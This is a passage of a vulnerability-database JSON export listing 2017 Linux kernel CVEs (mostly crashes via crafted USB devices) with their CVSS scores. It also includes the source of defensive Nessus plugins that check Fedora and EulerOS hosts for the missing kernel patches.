"2017-11-07T23:29:00", "title": "CVE-2017-16649", "type": "cve", "cwe": ["CWE-369"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16649"], "modified": "2018-11-28T11:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.11"], "id": "CVE-2017-16649", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16649", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.11:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:39", "description": "drivers/net/usb/asix_devices.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly have unspecified other impact via a crafted USB device.", "edition": 6, "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-07T23:29:00", "title": "CVE-2017-16647", "type": "cve", "cwe": ["CWE-476"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16647"], "modified": "2018-04-06T01:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.11"], "id": "CVE-2017-16647", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16647", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.11:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:39", "description": "The qmi_wwan_bind function in drivers/net/usb/qmi_wwan.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (divide-by-zero error and system crash) or possibly have unspecified other impact via a crafted USB device.", "edition": 6, "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-07T23:29:00", "title": "CVE-2017-16650", "type": "cve", "cwe": ["CWE-369"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16650"], "modified": "2018-08-24T10:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.11"], "id": "CVE-2017-16650", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16650", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.11:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:39", "description": "The hdpvr_probe function in drivers/media/usb/hdpvr/hdpvr-core.c in the Linux kernel through 4.13.11 allows local users to cause a denial of service (improper error handling and system crash) or possibly have unspecified other impact via a crafted USB device.", "edition": 6, "cvss3": {"exploitabilityScore": 0.7, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "PHYSICAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 6.6, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-11-07T23:29:00", "title": "CVE-2017-16644", "type": "cve", "cwe": ["CWE-388"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16644"], "modified": "2018-08-24T10:29:00", "cpe": ["cpe:/o:linux:linux_kernel:4.13.11"], "id": "CVE-2017-16644", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16644", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:linux:linux_kernel:4.13.11:*:*:*:*:*:*:*"]}, {"lastseen": "2021-02-02T06:36:40", "description": "The walk_hugetlb_range function in mm/pagewalk.c in the Linux kernel before 4.14.2 mishandles holes in hugetlb ranges, which allows local users to obtain sensitive information from uninitialized kernel memory via crafted use of the mincore() system call.", "edition": 19, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.5, "privilegesRequired": "LOW", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-11-27T19:29:00", "title": "CVE-2017-16994", "type": "cve", "cwe": ["CWE-200"], "bulletinFamily": "NVD", "cvss2": {"severity": "LOW", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.1, "vectorString": "AV:L/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-16994"], "modified": "2018-04-25T01:29:00", "cpe": [], "id": "CVE-2017-16994", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-16994", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": []}], "nessus": [{"lastseen": "2021-01-07T10:15:17", "description": "The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-01T00:00:00", "title": "Fedora 26 : kernel (2017-f9f3d80442)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16644"], "modified": "2017-12-01T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:26"], "id": "FEDORA_2017-F9F3D80442.NASL", "href": "https://www.tenable.com/plugins/nessus/104943", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-f9f3d80442.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104943);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n script_xref(name:\"FEDORA\", value:\"2017-f9f3d80442\");\n\n script_name(english:\"Fedora 26 : kernel (2017-f9f3d80442)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-f9f3d80442\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:26\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^26([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 26\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-f9f3d80442\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC26\", reference:\"kernel-4.13.16-200.fc26\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:11:57", "description": "The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2018-01-15T00:00:00", "title": "Fedora 27 : kernel (2017-92a0ae09aa)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16644"], "modified": "2018-01-15T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:27"], "id": "FEDORA_2017-92A0AE09AA.NASL", "href": "https://www.tenable.com/plugins/nessus/105930", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-92a0ae09aa.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105930);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n script_xref(name:\"FEDORA\", value:\"2017-92a0ae09aa\");\n\n script_name(english:\"Fedora 27 : kernel (2017-92a0ae09aa)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-92a0ae09aa\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:27\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/01/15\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^27([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 27\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-92a0ae09aa\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC27\", reference:\"kernel-4.13.16-300.fc27\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T10:11:53", "description": "The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.", "edition": 17, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-04T00:00:00", "title": "Fedora 25 : kernel (2017-905bb449bc)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-16994", "CVE-2017-16647", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16644"], "modified": "2017-12-04T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:25"], "id": "FEDORA_2017-905BB449BC.NASL", "href": "https://www.tenable.com/plugins/nessus/104979", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2017-905bb449bc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(104979);\n script_version(\"3.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n script_xref(name:\"FEDORA\", value:\"2017-905bb449bc\");\n\n script_name(english:\"Fedora 25 : kernel (2017-905bb449bc)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.13.16 update contains various fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2017-905bb449bc\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:25\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/11/07\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/12/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/12/04\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2017-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^25([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 25\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2017-16643\", \"CVE-2017-16644\", \"CVE-2017-16647\", \"CVE-2017-16649\", \"CVE-2017-16650\", \"CVE-2017-16994\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for FEDORA-2017-905bb449bc\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\nif (rpm_check(release:\"FC25\", reference:\"kernel-4.13.16-100.fc25\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-07T08:52:47", "description": "According to the versions of the kernel packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerabilities :\n\n - A flaw was found in the processing of incoming L2CAP\n bluetooth commands. Uninitialized stack variables can\n be sent to an attacker leaking data in kernel address\n space.(CVE-2017-1000410)\n\n - The qmi_wwan_bind function in\n drivers/net/usb/qmi_wwan.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16650)\n\n - The usbnet_generic_cdc_bind function in\n drivers/net/usb/cdc_ether.c in the Linux kernel through\n 4.13.11 allows local users to cause a denial of service\n (divide-by-zero error and system crash) or possibly\n have unspecified other impact via a crafted USB\n device.(CVE-2017-16649)\n\n - The ims_pcu_get_cdc_union_desc function in\n drivers/input/misc/ims-pcu.c in the Linux kernel\n through 4.13.11 allows local users to cause a denial of\n service (ims_pcu_parse_cdc_data out-of-bounds read and\n system crash) or possibly have unspecified other impact\n via a crafted USB device.(CVE-2017-16645)\n\n - The hdpvr_probe function in\n drivers/media/usb/hdpvr/hdpvr-core.c in the Linux\n kernel through 4.13.11 allows local users to cause a\n denial of service (improper error handling and system\n crash) or possibly have unspecified other impact via a\n crafted USB device.(CVE-2017-16644)\n\n - The parse_hid_report_descriptor function in\n drivers/input/tablet/gtco.c in the Linux kernel before\n 4.13.11 allows local users to cause a denial of service\n (out-of-bounds read and system crash) or possibly have\n unspecified other impact via a crafted USB\n device.(CVE-2017-16643)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 26, "cvss3": {"score": 6.6, "vector": "AV:P/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-12-07T00:00:00", "title": "EulerOS 2.0 SP2 : kernel (EulerOS-SA-2017-1319)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16649", "CVE-2017-1000410", "CVE-2017-16650", "CVE-2017-16643", "CVE-2017-16644", "CVE-2017-16645"], "modified": "2017-12-07T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:kernel-tools", "p-cpe:/a:huawei:euleros:kernel", "p-cpe:/a:huawei:euleros:kernel-debug-devel", "p-cpe:/a:huawei:euleros:perf", "p-cpe:/a:huawei:euleros:kernel-headers", "p-cpe:/a:huawei:euleros:kernel-debuginfo-common-x86_64", "p-cpe:/a:huawei:euleros:kernel-devel", "p-cpe:/a:huawei:euleros:kernel-debug", "p-cpe:/a:huawei:euleros:python-perf", "p-cpe:/a:huawei:euleros:kernel-tools-libs", "p-cpe:/a:huawei:euleros:kernel-debuginfo", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2017-1319.NASL", "href": "https://www.tenable.com/plugins/nessus/105047", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(105047);\n script_version(\"3.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2017-1000410\",\n \"CVE-2017-16643\",\n \"CVE-2017-16644\",\n \"CVE-2017-16645\",\n \"CVE-2017-16649\",\n \"CVE-2017-16650\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : kernel (EulerOS-SA-2017-1319)\");\n script_summary(english:\"Checks the rpm output for the updated packages.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing multiple security 